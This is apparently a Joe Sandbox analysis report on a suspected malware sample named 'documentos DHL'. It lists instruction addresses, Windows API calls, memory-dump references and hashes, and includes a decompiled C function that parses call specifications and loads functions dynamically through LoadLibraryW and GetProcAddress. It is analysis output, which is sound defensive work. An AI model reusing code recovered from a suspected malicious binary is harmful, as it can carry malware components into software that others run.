0x0040517b
0x0040517d
0x00405181
0x00405184
0x00000000
0x00405184
0x00405122
0x00404de2
0x00404de7
0x00404df0
0x00404df7
0x00404e05
0x00404e10
0x00404e16
0x00404e24
0x00404e38
0x00404e3d
0x00404e4a
0x00404e4f
0x00404e65
0x00404e76
0x00404e83
0x00404e83
0x00404e86
0x00404e8c
0x00404e8e
0x00404e91
0x00404e96
0x00404e9b
0x00404e9d
0x00404e9d
0x00404ebd
0x00404ebd
0x00404ebf
0x00404ec0
0x00404ec5
0x00404ec8
0x00404ecb
0x00404ecf
0x00404ed4
0x00404ed9
0x00404edd
0x00404ee2
0x00404ee7
0x00404ee9
0x00404ef1
0x00404fbc
0x00404fcf
0x00000000
0x00404ef7
0x00404efa
0x00404efd
0x00404f00
0x00404f00
0x00404f07
0x00404f0d
0x00404f10
0x00404f16
0x00404f17
0x00404f1c
0x00404f25
0x00404f2c
0x00404f2f
0x00404f32
0x00404f35
0x00404f71
0x00404f92
0x00404f9a
0x00404f73
0x00404f80
0x00404f80
0x00404f37
0x00404f3a
0x00404f49
0x00404f53
0x00404f5b
0x00404f62
0x00404f6a
0x00404f6a
0x00404f35
0x00404fa0
0x00404fa1
0x00404fad
0x00404fad
0x00404fba
0x00404fd5
0x00404fd9
0x00404ff6
0x00404ffb
0x00000000
0x00404fdb
0x00404fe0
0x00404fe9
0x00405373
0x00405385
0x00405385
0x00404fd9
0x00000000
0x00404fba
0x00404ef1

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DA8
GetDlgItem.USER32(?,00000408), ref: 00404DB3
GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
LoadBitmapW.USER32(0000006E), ref: 00404E10
SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
DeleteObject.GDI32(00000000), ref: 00404E86
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
ShowWindow.USER32(?,00000005), ref: 00404FE0
SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
ImageList_Destroy.COMCTL32(?), ref: 004051B0
GlobalFree.KERNEL32(?), ref: 004051C0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00405311
ShowWindow.USER32(?,00000000), ref: 0040535F
GetDlgItem.USER32(?,000003FE), ref: 0040536A
ShowWindow.USER32(00000000), ref: 00405371

Strings

, xrefs: 00405349
M, xrefs: 00404F3A
N, xrefs: 0040501B

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				void* _t246;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t246 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t319 = _t246;
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}

0x10001b20
0x10001b23
0x10001b26
0x10001b29
0x10001b2c
0x10001b2f
0x10001b32
0x10001b34
0x10001b37
0x10001b3c
0x10001b3f
0x10001b47
0x10001b4f
0x10001b51
0x10001b54
0x10001b5c
0x10001b5c
0x10001b61
0x10001b64
0x00000000
0x00000000
0x10001b6e
0x10001b71
0x10001b76
0x10001b78
0x10001beb
0x10001beb
0x10001beb
0x10001bef
0x10001bf2
0x10001bf4
0x10001c16
0x10001c18
0x10001c1b
0x10001c24
0x10001c2a
0x10001c2c
0x10001c32
0x10001c32
0x10001c38
0x10001c3b
0x10001c3b
0x10001c3e
0x10001c3e
0x10001c44
0x10001c46
0x10001c46
0x10001c48
0x10001c4b
0x10001c4e
0x10001c54
0x10001c5a
0x10001c5d
0x10001c81
0x10001c84
0x00000000
0x00000000
0x10001c87
0x10001c89
0x10001c97
0x10001c9a
0x10001c9c
0x00000000
0x00000000
0x00000000
0x00000000
0x10001c9e
0x10001c9e
0x10001c9e
0x10001ca4
0x10001ca6
0x00000000
0x00000000
0x10001ca8
0x10001caa
0x10001cac
0x10001cae
0x00000000
0x00000000
0x00000000
0x10001cae
0x10001cb0
0x10001cb2
0x10001cb4
0x10001cb4
0x10001cba
0x10001cc0
0x10001cc2
0x10001cd6
0x10001cd6
0x10001cd8
0x10001cc4
0x10001cca
0x10001ccd
0x10001ccd
0x00000000
0x10001c5f
0x10001c5f
0x10001c5f
0x10001c60
0x10001c68
0x10001c6c
0x10001c72
0x10001c76
0x10001cde
0x10001ce1
0x10001ce5
0x10001d70
0x10001d74
0x10001b59
0x00000000
0x10001b59
0x00000000
0x10001d74
0x10001c62
0x10001c62
0x10001c63
0x00000000
0x00000000
0x10001c65
0x10001c66
0x00000000
0x00000000
0x00000000
0x10001c66
0x10001c5d
0x10001bf7
0x00000000
0x00000000
0x10001c00
0x10001c03
0x10001c10
0x10001c10
0x10001c05
0x00000000
0x10001c05
0x10001b7a
0x10001b7d
0x10001bce
0x10001bd1
0x10001be3
0x10001be3
0x10001be6
0x00000000
0x10001be6
0x10001bd3
0x10001bd8
0x00000000
0x00000000
0x10001bda
0x10001bdd
0x10001ced
0x10001cf0
0x10001cf0
0x10001cf2
0x10002048
0x1000204b
0x100020b2
0x10001d60
0x10001d63
0x10001d66
0x10001d69
0x10001d69
0x10001d6b
0x10001d6c
0x10001d6c
0x10001d6d
0x00000000
0x10001d6d
0x1000204d
0x10002050
0x10002057
0x10002057
0x1000205b
0x1000206f
0x1000206f
0x10002072
0x10002076
0x100020be
0x100020c1
0x100020c5
0x00000000
0x100020c5
0x10002078
0x1000207c
0x00000000
0x00000000
0x1000207e
0x10002085
0x10002085
0x1000208b
0x1000208e
0x100020aa
0x10002090
0x10002099
0x1000209c
0x1000209c
0x00000000
0x1000208e
0x1000205d
0x10002060
0x10002064
0x00000000
0x00000000
0x10002066
0x00000000
0x10002066
0x10002052
0x10002055
0x00000000
0x00000000
0x00000000
0x10002055
0x10001cf8
0x10001cf8
0x10001cf9
0x10001e29
0x10001e29
0x10001e2e
0x10001e31
0x00000000
0x00000000
0x10001e3e
0x00000000
0x10001fe5
0x10001fe8
0x10001feb
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x10001ff8
0x10001ff8
0x10001ffc
0x10002014
0x10002017
0x10002021
0x00000000
0x10002021
0x10001ffe
0x10001ffe
0x10002001
0x00000000
0x00000000
0x10002003
0x10002006
0x10002008
0x10002009
0x10002009
0x10002009
0x1000200a
0x1000200d
0x10002010
0x10002011
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x00000000
0x10001ff6
0x00000000
0x10001e85
0x00000000
0x00000000
0x10001e91
0x00000000
0x00000000
0x10001e78
0x10001e7c
0x10001e80
0x00000000
0x00000000
0x10001fb6
0x10001fba
0x00000000
0x00000000
0x10001fc0
0x10001fc9
0x10001fd0
0x10001fd8
0x00000000
0x00000000
0x10001f53
0x10001f53
0x00000000
0x00000000
0x10001e9a
0x00000000
0x00000000
0x10002040
0x00000000
0x00000000
0x10002030
0x00000000
0x00000000
0x10002034
0x00000000
0x00000000
0x1000203c
0x00000000
0x00000000
0x10001f76
0x00000000
0x00000000
0x10001f5b
0x10001f5d
0x00000000
0x00000000
0x10001f7e
0x00000000
0x00000000
0x10001f63
0x00000000
0x00000000
0x10001f67
0x00000000
0x00000000
0x10002038
0x10002042
0x10002042
0x00000000
0x00000000
0x10001f86
0x10001f8a
0x10001f8f
0x10001f92
0x10001f93
0x10001f96
0x10001f9c
0x10001f9c
0x00000000
0x00000000
0x10002028
0x00000000
0x00000000
0x10001f6b
0x10001f6e
0x10001f70
0x00000000
0x00000000
0x10001ea1
0x10001ea1
0x00000000
0x00000000
0x10001f7a
0x10001f80
0x10001f80
0x10001ea3
0x10001ea3
0x10001ea6
0x10001ead
0x10001eb0
0x10001eb2
0x10001eb4
0x10001eb5
0x10001eb9
0x10001ebc
0x10001ec2
0x10001ec8
0x10001ec8
0x10001eca
0x10001eca
0x10001ecd
0x10001ed3
0x10001ed5
0x10001ed9
0x10001ede
0x10001ede
0x10001ee0
0x10001ee0
0x10001ee3
0x10001ee6
0x10001eef
0x10001ef5
0x10001ef8
0x10001ef8
0x10001efa
0x10001efd
0x10001f03
0x00000000
0x10001f03
0x10001ec4
0x10001ec6
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e45
0x10001e4b
0x10001e4e
0x10001e50
0x10001e50
0x10001e53
0x10001e57
0x10001e64
0x10001e66
0x10001e6c
0x10001e6c
0x10001e6c
0x00000000
0x00000000
0x10001fa4
0x10001fa8
0x10001fad
0x10001fb0
0x10001f09
0x10001f09
0x10001f0b
0x00000000
0x00000000
0x10001f11
0x10001f11
0x10001f15
0x10001f1c
0x10001f40
0x10001f40
0x10001f44
0x10001f46
0x10001f49
0x10001f49
0x10001f4c
0x10001f4c
0x00000000
0x10001f44
0x10001f21
0x10001f24
0x10001f24
0x10001f2b
0x10001f2d
0x10001f30
0x10001f37
0x10001f38
0x10001f3e
0x10001f3e
0x00000000
0x10001f3e
0x10001f32
0x10001f35
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e3e
0x10001cff
0x10001cff
0x10001d00
0x10001e26
0x00000000
0x10001e26
0x10001d06
0x10001d07
0x00000000
0x00000000
0x10001d0f
0x10001d0f
0x10001d12
0x10001d5d
0x00000000
0x10001d5d
0x10001d14
0x10001d14
0x10001d17
0x10001d41
0x10001d44
0x10001d47
0x10001e18
0x10001e18
0x10001e18
0x10001d4d
0x10001d4d
0x10001d4d
0x10001e1e
0x00000000
0x10001e1e
0x10001d1a
0x10001d1a
0x10001d1b
0x10001d3e
0x10001d40
0x10001d40
0x00000000
0x10001d40
0x10001d1d
0x10001d1d
0x10001d20
0x10001d3a
0x00000000
0x10001d3a
0x10001d22
0x10001d22
0x10001d25
0x10001d36
0x00000000
0x10001d36
0x10001d27
0x10001d27
0x10001d28
0x10001d32
0x00000000
0x10001d32
0x10001d2b
0x10001d2c
0x00000000
0x00000000
0x10001d2e
0x00000000
0x10001d2e
0x00000000
0x10001bdd
0x10001b7f
0x10001b82
0x10001bb1
0x10001bb5
0x10001bbc
0x10001bc3
0x10001bc6
0x10001bc9
0x00000000
0x10001bc9
0x10001b84
0x10001b85
0x10001ba0
0x10001ba7
0x10001baa
0x00000000
0x10001baa
0x10001b8a
0x00000000
0x10001b90
0x10001b90
0x10001b97
0x00000000
0x10001b97
